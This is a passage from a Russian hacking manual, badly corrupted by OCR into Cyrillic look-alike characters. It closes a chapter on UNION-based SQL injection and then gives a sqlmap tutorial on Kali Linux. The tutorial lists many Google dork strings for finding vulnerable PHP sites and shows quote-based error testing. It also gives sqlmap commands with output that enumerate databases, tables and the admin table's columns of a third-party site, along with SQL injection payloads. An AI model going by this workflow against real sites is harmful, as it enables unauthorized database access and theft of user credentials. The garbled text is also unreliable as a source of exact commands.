меня в Интернете развелось «великих теоретиков» сколько угодно, то я решил сразу 
перейти к рассмотрению частичной технике ІД\МОІ\І. Но это не самая простая техника, 
да и статья уже получилась достаточно большой. 

В следующей части статьи мы изучим частичную технику ІІІМЮІМ, с её помощью мы 
получим все данные на сервере: имена баз данных, имена их таблиц и полей в этих 
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таблицах, а также их содержимое. Пока ждёте появления второй части — 
тренируйтесь, почитайте о ЗЩ-инъекциях и технике ІЛМІОІМ, дополнительно 
рекомендуются к ознакомлению следующие статьи: 

• Использование 5СЩѴ1АР на Каіі Ыпих: взлом веб-сайтов и баз данных через 5ЦІ_- 

инъекции 

• Защита сайта от взлома: предотвращение 5ЦІ_-инъекций 


• Как запустить здітар на ѴѴіпсіоѵѵб 


БЕЬЕСТ 


еком 

'шетЬегз’ 

ННЕКЕ 

паше = 1 Рето • 

АГГО ( 

БЕРЕСТ 

1 

ЕКОМ 

< 


БЕРЕСТ 


СОШТ(*) , 
СОИСАТ( 

( 


БЕРЕСТ 

МІР( 

( 

ІЕШРР( 

СА5Т (зс!іета_пате АЗ СНАК), 
0x20 
О 

), 

1, 

50 

) 

ЕКОМ 

ІЫЕОКМАТІОМБСНЕМА . 5СНЕМАТА 

РІМІТ 

2 , 1 


ЕРООН( 

ЫШР(О)* 2 

) 

) х 

ЕКОМ 

ШЕОКМАТI ОКГ_5 СНЕМА . СНАКАСТЕ К_5ЕТ 5 

СКОПР ВУ 

) а 

) 

АМР ' сШЖ’ = 1 сЦРК 1 

АМР раззѵогй = Нр аззѵогйЦ 


П.с. ах да, забыл про ЫМІТ. Тоже в следующий раз расскажу о роли ЫМІТ в 5Ц1_- 
инъекциях. 


Глава 35. Использование 5СЦМАР на Каіі Ыпих: взлом веб-сайтов 
и баз данных через $СЦ-инъекции 

Если вы являетесь пользователем \Л/іпс1оѵѵ$, то обратитесь к статье " Как запустить 
здітар на ѴѴіпсіоѵѵб ". А если вы обнаружили уязвимости в ваших скриптах, то 
обратитесь к статье " Защита сайта от взлома: предотвращение 501-инъекций ". 

Каждый раз, рассказывая об очередной программе, присутствующей в Каіі Ыпих, я 
задумываюсь, какие последствия это может вызвать? Эта статья была готова уже давно, 
но я всё как-то не решался опубликовать её. На самом деле, те, кто взламывают чужие 
сайты, уже давно и сами знают как пользоваться этой и многими другими 
программами. Зато среди (начинающих) программистов встречается огромное 
количество тех, кто вообще будто бы не задумывается о безопасности своих веб¬ 
приложений. Я прекрасно понимаю эту ситуацию, когда ты изучаешь РНР, то большим 
достижением и облегчением является то, что твоя программа вообще работает! 
Времени всегда не хватает и в этих условиях изучать теорию защиты веб-приложений 
кажется просто неразумным расточительством. 
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В этой статье я рассказываю о программе 5СЩѴІАР, которая поможет проверить ваши 
скрипты на уязвимость к 5ЦІ_-инъекциям. 

В общем, я надеюсь, что знания, полученные в этой статье, будут использоваться 
этично и с пользой для всех. 

5Щ-инъекция — это техника внедрения кода, используемая для атаки на приложение, 
управляющее данными, в которой (в технике) вредоносные 5Щ. запросы вставляются в 
поле ввода для исполнения (например, для получения атакующим содержания дампа 
базы данных). 5СЦ_-инъекция должна эксплуатировать уязвимость в безопасности 
программ, например, когда пользовательский ввод некорректно фильтруется на 
наличие различных специфичных символов, включённых в 5Щ. запросы, или когда 
пользовательский ввод не типизирован строго и выполняется неожиданным образом. 
5Щ.-инъекция — это самый широко известный вектор атаки не веб-сайты, но она может 
быть использована для атаки на любые типы 5СЦ. базы данных. В этой инструкции я 
покажу вам как с помощью программы 5СЩѴІАР эксплуатировать 5Щ-инъекции на Каіі 
Ыпих и, в конечном итоге, хакнуть веб-сайт (точнее говоря, базу данных) и извлечь 
имена пользователей и пароли на Каіі Ыпих. 

На всякий случай: Если у вас еще нет Каіі Ыпих, то о том где скачать и как установить 
читайте в статье « Как установить Каіі Ыпих: подробная инструкция для установки на 
компьютер и в виртуальную машину » — это одна из популярнейших статей на портале. 
А всевозможные мануалы, инструкции использования ищите на сайте ѴѴеЬѴѴаге.Ьіг по 
тэгу Каіі Ыпих . 

Что такое БЦЬМАР 

зцітар это инструмент с открытым кодом для тестирования на проникновение, 
который автоматизирует процесс выявления и эксплуатирования уязвимостей для 5Щ- 
инъекций и захвата серверов баз данных. Он поставляется с мощным движком 
анализа, большим количеством специфичных функций для максимального 
тестирования на проникновения и широким спектром возможностей простирающихся 
от выявления типа баз данных по «отпечаткам», охватывает получение информации из 
базы данных и вплоть до доступа к файловой системе и выполнения команд на ОС 
через нестандартный доступ к системе. 

Особенности 

• Полная поддержка систем управления базами данных Му501_, Огасіе, 
Роз1:§ге5Си., МісгозоД 501. 5егѵег, МісгозоД Ассезз, ІВМ 0В2, 50.1_і1:е, РігеЬігсІ, 
5уЬа$е и 5АР МахЭВ. 

• Полная поддержка шести техник 501-инъекции: слепая на логической основе, 
основанная на времени слепая, основанная на ошибках, ІІІМІОІМ запрос, сложные 
запросы и нестандартный доступ. 

• Поддержка прямого соединения к базе данных без прохода через 501- 
инъекцию путём предоставления полномочий СУБД, ІР адреса, порта и имени 
базы данных. 

• Поддержка перебора пользователей, хешей паролей, привилегий, ролей, баз 
данных, таблиц и колонок. 

• Автоматическое распознавание формата хеша пароля и поддержка их взлома 
используя основанную на словаре атаку. 
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• Поддержка, по выбору пользователя, создания дампа всех таблиц, 
определённого их диапазона или специфичных колонок. 

• Пользователь также может выбрать создание дампа только диапазона 
символов каждого вхождения колонки. 

• Поддержка поиска специфичных имён баз данных, специфичных таблиц по 
полным базам данных или по отдельным колонкам всех таблиц баз данных. Это 
полезно, например, для идентификации таблиц, содержащих учётные данные 
приложения, где соответствующие имена колонок содержат строки вроде пате 
и разз (имя и пароль). 

• Поддержка загрузки и выгрузки любого файл с (на) файловую системы сервера 
базы данных, когда используются такие программы баз данных как Му5Ц1_, 
Роз1;§ге5Щ или Місгозоіі: 5Щ. 5егѵег. 

• Поддержка выполнения произвольных команд и получение их стандартного 
вывода на операционной системе, под которой запущен сервер базы данных, 
когда используются такие программы баз данных как Му5Щ, Роз1;§ге5Щ и 
Місгозоіі: 5Щ Зегѵег. 

• Поддержка установки нестандартного соединения (оиІ-оІ'-ЬапсІ) ТСР между 
атакующей машиной и операционной системой на которой работает база 
данных. Этим каналом могут быть интеративные командные запросы, сессия 
Меііегргеіег или сессия графического пользовательского интерфейса (ѴІМС) — по 
выбору пользователя. 

• Поддержка процесса повышения прав пользователя через команды Меіазріоіі: 
передаваемые Меііегргеіег. 

Пожалуйста, всегда держите в голове мысль о пользователе, который тратит своё 
время и усилия на поддержание веб-сайта и, возможно, жизненно зависит от него. 
Ваши действия могут повлиять на кого-то так, как вы этого никогда не желали. Я не 
знаю, как ещё доходчивее объяснить это вам. 

Собственно, приступим: 


Шаг 1: Ищем уязвимый веб-сайтов 

Это, как правило, самое творческое действие и занимает больше времени, чем другие 
шаги. Те, кто знает как использовать Соо§1е Оогкз уже понимают, что нужно делать. Но 
в том случае, если вы не знаете, то я собрал вместе ряд строк, которые вы можете 
искать в Гугл. Просто скопируйте-вставьте любую из этих строк в Гугл, и Гугл покажет 
вам то, что сумел найти. 


Шаг І.а: Строки Соо^Іе Рогкз для поиска уязвимых к 5СЩѴІАР 5СЦ. веб¬ 
сайтов 

Этот список действительно большой. У меня заняло много времени для его сбора. Если 
вы понимаете принцип отбора, тогда вы можете дополнить его. Оставляйте ваши 
дополнения к списку в комментариях, я добавлю их сюда. 
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Соо§1е Эогк $1гіп§ Соіитп 1 

Соо§1е Эогк 5Ігіп§ Соіитп 

2 

Соо§1е йогк 5Ігіп§ Соіитп 3 

Іпиг1:і1ет_іс1= 

іпигІ:геѵіе\л/.рНр?ісІ= 

іпигІ:Ио5І;іп§_іпІ : о.рНр?ісІ= 

іпигІ:пе\л/5ІсІ= 

іпигііі пігіа1;іѵа.рЬр?іп= 

Іпиг1:§а11егу.р1ір?іс1= 

Іпиг1:1:гаіпег5.р1ір?іс1= 

іпигІ:сиггісиІит.рЬр?ісІ= 

іпигІ:гиЬ.рИр?ісІг= 

іпигІ:пе\л/5-1 г иІІ.рЬр?ісІ= 

іпигІ:ІаЬеІ5.рНр?ісІ= 

іпигІ:ѵіе\л/_Гар.рІір?ісІ= 

Іпиг1:пе\л/5_с1і5р1ау.р1ір?§е1;іс1= 

іпигІ:5І;огу.рЬр?ісІ= 

іпигІ:аг1;ікеІіпІ : о.рИр?ісІ= 

іпигІ:іпсІех2.рНр?ор1;іоп= 

іпигІ:Іоок.рЬр?Ю= 

іпигІ:сІе1;аіІ.рЬр?Ю= 

іпигІ:геасІпе\л/5.рНр?ісІ= 

іпигІ:пе\л/5опе.рНр?ісІ= 

іпигІ:іпсіех.рНр?= 

іпигІ:1:ор10.рНр?са1:= 

іпигІ:аЬои1;Ьоок.рЬр?ісІ= 

іпигІ:ргоЯІе_ѵіе\л/.рНр?ісІ= 

іпигІ:пе\л/50пе.рНр?ісІ= 

іпигІ:та1:егіаІ.рНр?ісІ= 

іпигІ:са1:е§огу.рНр?ісІ= 

іпигІ:еѵеп1;.рНр?ісІ= 

іпигІ:оріпіоп5.рНр?ісІ= 

іпигІ:риЫіса1;іоп5.рИр?ісІ= 

іпигІ:ргосІис1;-і1;ет.рЬр?ісІ= 

іпигІ:аппоипсе.рНр?ісІ= 

іпигІ:І : еІІо\л/5.рНр?ісІ= 

іпигІ:5рІ.рНр?ісІ= 

іпигІ:гиЬ.рНр?ісІг= 

іпигІ:сІо\л/пІоасІ5_іпІ : о.рНр?ісІ= 

іпигІ:іпсІех.рЬр?са1:ісІ= 

іпигІ:§аІегі_іп1 : о.рЬр?І= 

іпигІ:ргосІ_іп1 : о.рИр?ісІ= 

іпигІ:пе\л/5.рЬр?са1;ісІ= 

іпигІ:1:ек$1:.рЬр?ісІ1:= 

іпигІ:5І"юр.рНр?сІо=раг1:&ісІ= 

іпигІ:іпсІех.рЬр?ісІ= 

іпигІ:пе\л/зса1;.рИр?ісІ= 

іпигІ:ргосІис1;іпІ : о.рИр?ісІ= 

іпигІ:пе\л/5.рЬр?ісІ= 

іпигкпеѵѵзІаскеМпІчэ.рНрРісІ 

п= 

іпигІ:соІІес1;іопі1;ет.рИр?ісІ= 

іпигІ:іпсІех.рЬр?ісІ= 

іпигІ:гиЬгіка.рИр?ісІг= 

іпигІ:ЬапсІ_іпІ : о.рИр?ісІ= 

іпигІ:1:гаіпег5.рНр?ісІ= 

іпигІ:гиЬр.рИр?ісІг= 

іпигІ:ргосІис1;.рНр?ісІ= 

іпигІ:Ьиу.рИр?са1;е§огу= 

іпигІ:о^ег.рЬр?ісІ^= 

іпигІ:геІеа5е5.рНр?ісІ= 

іпигІ:аг1;ісІе.рЬр?Ю= 

іпигІ:аг1:.рНр?ісІт= 

іпигІ:гау.рЬр?ісІ= 

іпигІ:рІау_оІсІ.рИр?ісІ= 

іпигІ:1:і1:Іе.рЬр?ісІ= 

іпигІ:ргосІиі1;.рНр?ісІ= 

іпигІ:сІесІага1:іоп_тоге.рЬр?сІе 

СІ_ІСІ = 

іпигІ:пе\л/5_ѵіе\л/.рНр?ісІ= 

іпигІ:рор.рЬр?ісІ= 

іпигІ:ра§еісІ= 

іпигІ:$еІес1;_ЬіЫіо.рИр?ісІ= 

іпигІ:5Иорріп§.рИр?ісІ= 

Іпиг1:§атез.р1ір?іс1= 

іпигІ:Ііитог.рНр?ісІ= 

іпигІ:ргосІис1:сІе1:аіІ.рНр?ісІ= 

іпигІ:ра§е.рЬр?1 : іІе= 

іпигІ:аЬои1;Ьоок.рЬр?ісІ= 

іпигІ:роз1;.рНр?ісІ= 

іпигІ:пе\л/$0е1:аіІ.рНр?ісІ= 

іпигІ:о§І_іпе1;.рИр?о§І_ісІ= 

і п и гі :ѵіе\л/5 ЬоѵѵсІ еіа і 1. рЬ р?ісІ= 
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іпигІ:§аІІегу.рНр?ісІ= 

іпигІ:^ісЬе_5рес1;асІе.рИр?ісІ 

іпигІ:сІиЬра§е.рНр?ісІ= 

іпигІ:аг1:ісІе.рНр?ісІ= 

іпигІ:соттипщие_сІе1:аіІ.рН 

р?ісІ= 

іпигктетЬегІ п^о.рЬр?ісІ= 

іпигІ:5Ио\л/.рНр?ісІ= 

іпигІ:зет.рЬрЗ?ісІ= 

іпигІ:зес1;іоп.рНр?ісІ= 

Іпиг1:з1;а1 : 1 : _іс1= 

іпигІ:ка1;е§огіе.рНр4?ісІ= 

іпигІ:1:Нете.рНр?ісІ= 

іпигІ:пе\л/5І1;ет.рІір?пит= 

іпигІ:пе\л/5.рЬр?ісІ= 

іпигІ:ра§е.рНр?ісІ= 

іпигІ:геасІпе\л/$.рНр?ісІ= 

Іпиг1:іпс1ех.р1ір?іс1= 

іпигіізкігесісіег- 

са1:е§огіе$.рЬр?ісІ= 

іпигІ:1;ор10.рИр?са1;= 

іпигІ:^ар2.рЬр?ісІ= 

іпигІ:1тасІеСа1:е§огу.рІір?ісІ= 

і пи гІіЫзТогіа Іеег.рЬр?пит= 

іпигІ:5Ио\л/_ап.рЬр?ісІ= 

іпигІ:ргосІис1;_гап§е5_ѵіе\л/.рЬ 

р?Ю= 

іпигІ:геа§іг.рЬр?пит= 

іпигІ:ргеѵіе\л/.рИр?ісІ= 

іпигІ:5Иор_са1;е§огу.рЬр?ісІ= 

іпигІ:Зі;гау-Цие5І;іоп5- 

Ѵіе\л/.рІір?пит= 

іпигІ:Іоасір5Ь.рНр?ісІ= 

іпигІ:1тап5сгір1:.рНр?ісІ= 

іпигІ:1 : огит_ЬсІ5.рЬр?пит= 

іпигІ:оріпіоп5.рНр?ісІ= 

іпигІ:сЬаппеІ_ісІ= 

Іпиг1:§ате.р1ір?іс1= 

іпигІ:зрг.рЬр?ісІ= 

іпигі іаЬоиТЬоок. рЬр?ісІ= 

іпигІ:ѵіе\л/_ргосІис1;.рИр?ісІ= 

іпигІ:ра§е5.рИр?ісІ= 

іпигІ:ргеѵіе\л/.рЬр?ісІ= 

іпигІ:пе\л/5опе.рНр?ісІ= 

іпигІ:аппоипсе.рЬр?ісІ= 

іпигІ:ІоасІр$Ь.рНр?ісІ= 

іпигІ:5\л/_соттеп1;.рНр?ісІ= 

іпигІ:сІапек.рЬр4?ісІ= 

іпигІ:ра§ез.рНр?ісІ= 

іпигІ:пе\л/$.рНр?ісІ= 

іпигІ:раг1:ісірап1:.рНр?ісІ= 


іпигІ:аѵсІ_5І:аг1:.рНр?аѵсІ= 

іпигІ:сІо\л/пІоасІ.рИр?ісІ= 


іпигІ:еѵеп1:.рНр?ісІ= 

іпигІ:таіп.рНр?ісІ= 


іпигІ:ргосІис1;-і1;ет.рІір?ісІ= 

іпигІ:геѵіе\л/.рЬр?ісІ= 


іпигІ:5рІ.рИр?ісІ= 

іпигІ:сИарріе5.рИр?ісІ= 


іпигІ:та1:егіаІ.рНр?ісІ= 

іпигІ:геасІ.рНр?ісІ= 


іпигІ:сІапек.рЬр4?ісІ= 

іпигІ:ргосІ_сІе1;аіІ.рНр?ісІ= 


іпигІ:аппоипсе.рНр?ісІ= 

іпигІ:ѵіе\л/рНо1;о.рНр?ісІ= 


іпигІ:сЬарріе5.рИр?ісІ= 

іпигІ:аг1;ісІе.рЬр?ісІ= 


іпигІ:геасІ.рЬр?ісІ= 

Іпиг1:рег50п.ркір?іс1= 
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іпигІ:ѵіе\л/арр.рНр?ісІ= 

іпигІ:ргосІис1:іп1 : о.рГір?ісІ= 


іпигІ:ѵіе\л/рГю1:о.рГір?ісІ= 

іпигІ:5Гю\л/іт§.рГір?ісІ= 


іпигІ:гиЬ.рГір?ісІг= 

іпигІ:ѵіе\л/.рГір?ісІ= 


іпигЕёаІегМпІо.рГір?^ 

іпигІ:\л/еЬзі1:е.рГір?ісІ= 



Шаг 1.6: Начальная проверка для подтверждения, уязвим ли веб-сайт к 
5СЩѴІАР 5С11.-инъекции 


Для каждой строки, которые приведены выше, вы найдёте сотни поисковых 
результатов. Как узнать, которые из них действительно уязвимы к 5СЩѴІАР 5Щ.- 
инъекции. Есть множество способов и я уверен, что люди будут спорить, какой из них 
лучший, но для меня следующий является самым простым и наиболее убедительным. 


Допустим вы ищите, используя эту строку іпигІ:гиЬгіка.рНр?іс1г=, и один из веб-сайтов в 
результатах поиска вроде этого: 


1 


Ы:1:р://\л/\л/ѵѵ.5рІсІитту\л/еЬ5І1:е.пате/гиЬгіка.рКр?ісІ=28 


Просто добавьте одиночную кавычку ' в конец ІШІ_. (Просто для уверенности " — это 
двойная кавычка, а ' — это одиночная кавычка). 


Следовательно сейчас адрес будет примерно таким: 


1 


Ьггр://ѵѵ\/ѵ\/ѵ.5ЦІсіитту\/ѵеЬ5іге.пате/гиЬпка.рІтр?ісІ=28' 


Если страница вернёт 5СЦ. ошибку, значит страница уязвима для 5ЩМАР 5Щ-инъекции. 
Если она загружается или перенаправляет вас на другую страницу, переходите к 
следующей странице в результатах поиска Гугл. 


Посмотрите на скриншот ниже. 

^шиэииш эи іиігѵи 


\Ѵагпіп§ ту^1_ГеТсЬ_аггау() ехресіз рагатегег 1 го Ье гезоигсе, Ьооіеап еіѵеп ш 

шпГ /(Іаіа/ассоипіз/т/тізоЛ/<1агаЛѵлѵтѵ тІзоГг/Іашіпаг.паше 
/іпс/с1апку_гиЬгіка.рЬр оп Іте 12 

\Ѵагпіп§ т>^1_ГегсЬ_аггау() ехресТз рагатеіег 1 го Ье гезоигсе, Ьооіеап діѵеп т 

шпГ с1а(а/ассоипгз/т тГзоЙ/сІага 'тлэѵ шГзоГг/Іашіпаг.паше 
/іпс/сІапку гиЬгіка.рЬр оп Іте 15 

2агіт іасіпё сіапкѵ 

I 

Ргпѵп7ііір Мііяп I ятіпяі 
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Примеры ошибок 5СШ от различных баз данных и языков 

МісгозоЛ БСЦ. Бегѵег 


1| 

Бегѵег Еггог іп '/' Арріісаііоп. ІІпсІовесІ риоіаііоп тагк Ьеіоге ІІіе сііагасіег 5Тгіп§ 

'аііаск;' 

21 

Оезсгірііоп: Ап ипііапсіесі ехсерііоп оссиггесі сІигіп§ ІІіе ехесиііоп оі ІІіе сиггепі ѵѵеЬ 
гериезі. РІеазе геѵіеѵѵ ІІіе 5Іаск Ігасе Іог тоге іпіогтаііоп аЬои! ІІіе еггог ѵѵііеге І1 
огі§іпа1есІ іп ІІіе сосіе. 

3| 

Ехсерііоп Оеіаііз: БузІет.ОаІа.БрІСІІепІ.БрІЕхсерІіоп: ІІпсІозесІ риоіаііоп тагк Ьеіоге 

ІІіе сііагасіег 5Тгіп§ 'аііаск;'. 

МуБЦІ. ошибки 

і| 

\Д/агпіп§: тузрІ_ТеТсІэ_аггау(): зиррііесі аг§итеп1 із поі а ѵаіісі МуБЩ гезиіі: гезоигсе іп 
/ѵаг/ѵѵѵѵѵѵ/туаѵѵезотезІоге.сот/ЬиузІиІТ.рІір оп Ііпе 12 

21 

Еггог: Ѵои Ііаѵе ап еггог іп уоиг 5СЩ зупіах: сііеск ТИе тапиаі ТЬаТ соггезропсіз Іо уоиг 
МуБЩ. зегѵег ѵегзіоп Тог ТИе гі§ТіТ зупіах Іо изе пеаг аі Ііпе 12 

Огасіе ошибки 

і| 

іаѵа.зрІ.БСЩЕхсерІіоп: ОВА-00933: 5Щ соттапсі поі ргорегіу епсіесі аі 
огасІе.ісІЬс.сІЬаассе55.0ВЕггог.1Ііго\л/5рІЕхсер1іоп(0ВЕггог.]аѵа:180) аі 
огасІе.]сІЬс.11с7.ТТІоег.ргосе55Еггог(ТТІоег.]аѵа:208) 

21 

Еггог: БЩЕхсерІіопіаѵа.зрІ.БЩЕхсерІіоп: ОКА-01756: диоіесі з!гіп§ поі ргорегіу 
Іегтіпаіесі 

РозІегеБСЦ. Еггогз 

і| 

Циегу ТаіІесІ: ЕККОК: ипіегтіпаіесі диоіесі з!гіп§ аі ог пеаг 


Шаг 2: Строим список баз данных СУБД используя 5СЦМАР БСЦЬ-инъекцию 


Как вы могли увидеть по вышеприведённому скриншоту, я нашёл уязвимый веб-сайт к 
5Щ.МАР ЗСЦ-инъекции. Сейчас мне нужно построить список всех баз данных уязвимой 
СУБД (это ещё называется перечислением баз данных СУБД). Так как я использую 
5Ц1.МАР, то она также скажет мне, какая переменная является уязвимой. 


Запустим следующую команду в отношении вашего уязвимого веб-сайта: 


1 


зрітар -и Ьі1р://ѵѵѵѵ\/ѵ.5рІ(1итту\/ѵеЬ5І1е.пате/гиЬгіка.рІір?ісІ=31 --сІЬз 


Здесь: 

здітар = Имя бинарного файла программы зрітар 

-и = Целевой адрес (например. "Ті1:1:р://\л/\л/\л/.5рІсІиттуѵѵеЬзіТе.пате/гиЬгі ка .рЬр?ісІ=31") 
— сІЬз = Перечислить базы данных СУБД 
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Скриншот ниже: 


гооі(ЗкаІі-т і :~# здітар -и ѵлм. Іатіпаі .пате/гиЬгіка.рИр?ісІ=31 --сІЬз 

здітар/і .Ѳ-сІѳѵ - аиіотаііс 501. іпіѳсііоп апсі сІаіаЬазѳ іакеоѵег іооі 
Иіір://здітар.огд 

[!] ІедаІ сіізсіаітѳг: ІІзаде оГ здітар 'Гог аііаскіпд іагдеіз ѵѵііНоиі ргіог тиіиаі сопзепі із іііедаі. II: 
НаЫЦІу апсі агѳ пот гѳзропзіЬІе Тог апу шізизе ог сіатаде саизесі Ьу іИіз ргодгаш 

[*] зіагііпд аі 18:46:58 

[18:46:58] [ІЫРО] гѳзишіпд Ьаск-ѳпсІ ЭВМЗ 'тузді' 

[18:46:59] [ІШО] іезііпд соппесііоп іо іКе іагдеі ІІВІ_ 

здітар ісІепііТіегі ікіе Гоііоѵлпд іпіесііоп роіпіз \л/ііИ а іоіаі оі 0 НТТР(з) гедиезіз: 

Ріасе: СЕТ 
Рагатеіег: ісі 

Туре: ЬооТеап-ЬазесІ Ыіпсі 

Тіііе: АШ ЬооТеап-ЬазесІ Ыіпсі - МНЕВЕ ог НАУШС сіаизе 
РауТоасІ: ісІ=24' АИР 3045=3045 АШ 'Су02' = 'СуОг 

Туре: АШ/ОК іітѳ-ЬазесІ Ыіпсі 

Тіііе: МуЗС)І_ > 5.0.11 АШ ііте-ЬазесІ Ыіпсі 

РауТоасІ: ісІ=24 ' АШ 51ЕЕР(5) АШ ' сѴйЕ ' = ' сѴЭЕ 

[18:47:01] [ІШО] іНе Ьаск-епсі РВМЗ із МуЗСІ 

\л/еЬ зѳгѵѳг орегаііпд зузіеш: І_іпих Сѳпіоо 
ѵѵеЬ аррТісаііоп іесИпоіоду: ІМдіпх, РНР 5.3.29 
Ьаск-епсі йВИЗ: Му50І_ 5.0.11 

[18:47:01] [ІЫРО] іеісЬіпд сіаіаЬазе патез 
[18:47:01] [ІкІРО] іеісЬіпд питЬег оі сІаіаЬазез 
[18:47:01] [ІШО] гезитесі: 2 
[18:47:01] [ІЫРО] гезишесі: іпіогтаііоп_зсЬета 
[18:47:01] [ІкІРО] гезитесі: Татіпаі 
аѵаіТаЬТѳ сІаіаЬазез [2] : 

[*] іпіогтаііоп_зсЬета 
[*] Татіпаі 

[18:47:01] [ІШО] іеісЬесі сіаіа ТоддѳсІ іо іѳхі Тііез ипсіѳг ' /изг/зЬаге/здІшар/оиіриі/ѵлѵѵѵ.Татіпаі .пате ' 

[*] зЬиіііпд сіоѵѵп аі 18:47:01 

гооідкаіі- :~# | 


Эта команда раскрыла совсем немного интересной информации: 


1| 

ѵѵеЬ зегѵег орегаііп§ зузіет: Ыпих Сепіоо 

21 

ѵѵеЬ арріісаііоп ІесЬпоІо§у: 1\1§іпх, РНР 5.3.29 

3| 

Ьаск-епсі 0ВМ5: МуБСЩ 5.0.11 

4| 

[18:47:01] [ІІЧРО] гезитес): іп1іэгта1:іоп_5СІіета 

51 

[18:47:01] [ІІЧРО] гезитесі: Іатіпаі: 


Итак, сейчас у нас есть всего лишь одна база данных, в которую стоит заглянуть, 
іп1югта1:іоп_5сІтета — это стандартная база данных для почти каждой СУБД МѴ5Щ. 
Следовательно, направим свой интерес на базу данных Іатіпаі. 


Шаг 3. Построение списка таблиц целевой базы данных, используя 
5СЩѴІАР БЦЬ-инъекцию 


Нам нужно знать как много таблицы имеются в СУБД этого веб-сайта и какие у них 
имена. Чтобы найти эту информацию выполните следующую команду: 


1 


зцітар -и ѵѵуѵѵѵ.5ЦІгіитту\/ѵеЬ5ІТе.пате/гиЬпка.рІір?ісІ=31 -Э Іатіпаі: -ІаЫез 
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Славненько, эта база данных имеет 18 таблиц: 


1| 

[18:52:25] [ІІМРО] РеРсЫп§ РаЫез Рог сІаРаЬазе: 'ІатіпаР' 

2 1 

[18:52:25] [ІІМРО] РеРсЫп§ питЬег оР РаЫез Рог сІаРаЬаБе ’ІатіпаР' 

3| 

[18:52:25] [ІІМРО] гезитесі: 18 

4| 

[18:52:25] [ІІМРО] гезитесі: асітіп 

5 1 

[18:52:25] [ІІМРО] гезитесі: Ьгоѵѵзег 

6| 

[18:52:25] [ІІМРО] гезитесі: сіізкизе 

71 

[18:52:25] [ІІМРО] гезитесі: сіізкизе_оЬог 

81 

[18:52:25] [ІІМРО] гезитесі: сІІ5кизе_Рета 

91 

[18:52:25] [ІІМРО] гезитесі: ЫзРогіе 

101 

[18:52:25] [ІІМРО] гезитесі: та§_асітѵоІЬу 

111 

[18:52:25] [ІІМРО] гезитесі: та§_апкеРа 

121 

[18:52:25] [ІІМРО] гезитесі: та§_аиРогі 

131 

[18:52:25] [ІІМРО] гезитіп§ рагРіаІ ѵаіие: та§_сІа 

141 

[18:52:25] [ѴѴАКІМІІМО] гиппіп§ іп а зіп§Іе-РРігеасі тосіе. Ріеазе сопзісіег 151 иза§е оР 
орРіоп '--РНгеасіз' Рог РаэРег сіаРа геРгіеѵаІ 

151 

[18:52:25] [ІІМРО] геРгіеѵесі: огі 

161 

[18:54:23] [ІІМРО] геРгіеѵесі: та§_сІаогі... 


гооіоікаіі-тіа :-# здітар -и мм.іатіпаі: .патѳ/гиЬгіка.рЬр?ісі=31 -Э Іатіпаі --ТаЫез 

здітар/і .0-сІеѵ - аиіотаііс 501_ іпіѳсТіоп апсі ЬаТаЬазе Такеоѵѳг іооі 
Ы; 1;р ://здІтар .огд 

[!] Іедаі сіізсіаітѳг: ІІзаде оТ здітар ‘Гог аііаскіпд іагдеіз Рл/ііЬоиТ ргіог тиіиаі сопзепі із іііедаі. II; із ТЬѳ ѳпсі изег'з ге« 
ІіаЬіІііу апсі аге по! гезропзіЬІе -Гог апу тізизе о г сіатаде саизесі Ьу ТТііз ргодгат 

[*] зіагііпд аі 18:52:23 

[18:52:23] [ІЫРО] гезитіпд Ьаск-епсі йВМБ 'тузді' 

[18:52:23] [ШРО] Тезііпд соппесТіоп Іо ТЬе іагдеі ІІРЬ 

здітар ісІепііТіѳсі іЬе Тоііоѵуіпд іпіѳсііоп роіпіз мііЬ а іоіаі оТ 0 ИТТР(з) гедиѳзіз: 

Ріасе: СЕТ 
Рагатеіег: ісі 

Туре: Ьооіѳап-Ьазесі ЬІіпсІ 

Тіііе: АШ Ьооіеап-Ьазесі ЬІіпсі - Ѵі/НЕВЕ ог НАѴІМС сіаизе 
Рауіоасі: №24' АШ 3045=3045 АШ ‘СуОг 1 = 1 СуОг 

Туре: АШ/ОК Тіте-Ьазесі ЬІіпсі 

Тіііе: Му50І_ > 5.0.11 АШ ііте-ЬазесІ ЬІіпсі 

Рауіоасі: ісІ=24' АШ 2І_ЕЕР(5) АШ 'сѴ0Е' = 'сѴ0Е 

[18:52:25] [Ш=0] НЬе Ьаск-епсі йВМЗ із Му50І_ 

меЬ зегѵег орѳгаііпд зузіет: І_іпих СепТоо 
ѵѵеЬ арріісаііоп ІесЬпоІоду: Nдіпx, РНР 5.3.29 
Ьаск-епсі йВМЗ: Му30[_ 5.0.11 

[18:52:25] [ІІМРО] ТеісТііпд ІаЫѳз Тог сіаіаЬазе: 'Іатіпаі' 

[18:52:25] [ІІМРО] ТѳісЬіпд питЬег оТ ТаЫез Тог сіаіаЬазе 'Іатіпаі' 

[18:52:25] [ІІМРО] гезитесі: 18 

[18:52:25] [ІІМРО] гезитесі: асітіп 

[18:52:25] [ІІМРО] гезитесі: Ьгомзег 

[18:52:25] [INР0] гезитесі: сіізкизе 

[18:52:25] [ІІМРО] гезитесі: сІізкизе_оЬог 

[18:52:25] [ІІМРО] гезитесі: Ьізкизе_іета 

[18:52:25] [ІІМРО] гезитесі: Ьізіогіе 

[18:52:25] [ІІМРО] гезитесі: тад_ас!тѵо1Ьу 

[18:52:25] [ІІМРО] гезитесі: тад_апкеіа 

[18:52:25] [ІІМРО] гезитесі: тад_аиіогі 

[18:52:25] [ІЫРО] гезитіпд рагііаі ѵаіие: тад_с!а 

[18:52:25] [МАВГМІІМС] гиппіпд іп а зіпдІе-іЬгеасі тосіе. Ріеазе сопзісіег изаде оТ орііоп '--іЬгеасІз' Тог Тазіег сіаіа геігіеѵаі 
[18:52:25] [ІІМРО] геігіеѵесі: огі 
[18:54:23] [І№=0] геігіеѵегі: тад_с1аогі| 


Ну и конечно мы хотим проверить, что находится внутри асітіп, используя 5Щ.МАР 5Щ.- 
инъекцию, поскольку, возможно, именно она содержит имя пользователя и пароль. 
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Шаг 4: Построение списка столбцов целевой таблицы выбранной базы 
данных используя 5СМ.МАР БЦЬинъекцию 


Сейчас нам нужно построить список столбцов целевой таблицы асіппіп базы данных 
нашего веб-сайта, используя 5СЩѴІАР 50.1,-инъекцию. 5Щ.МАР 5Щ-инъекция делает это 
действительно простым, запустите следующую команду: 


1 


зцітар -и ѵѵѵѵѵѵ.зцІсіитту\/ѵеР)5іРе.пате/гиІэгіка.рРір?ісі=31 -й ІатіпаР -Т асітіп --соіитпз 


1| 

[19:57:42] [ІІМРО] РеРсРііп§ соіитпз Рог Раіэіе 'асітіп' іп сіаРаІэазе 'Іатіпаі:' 

21 

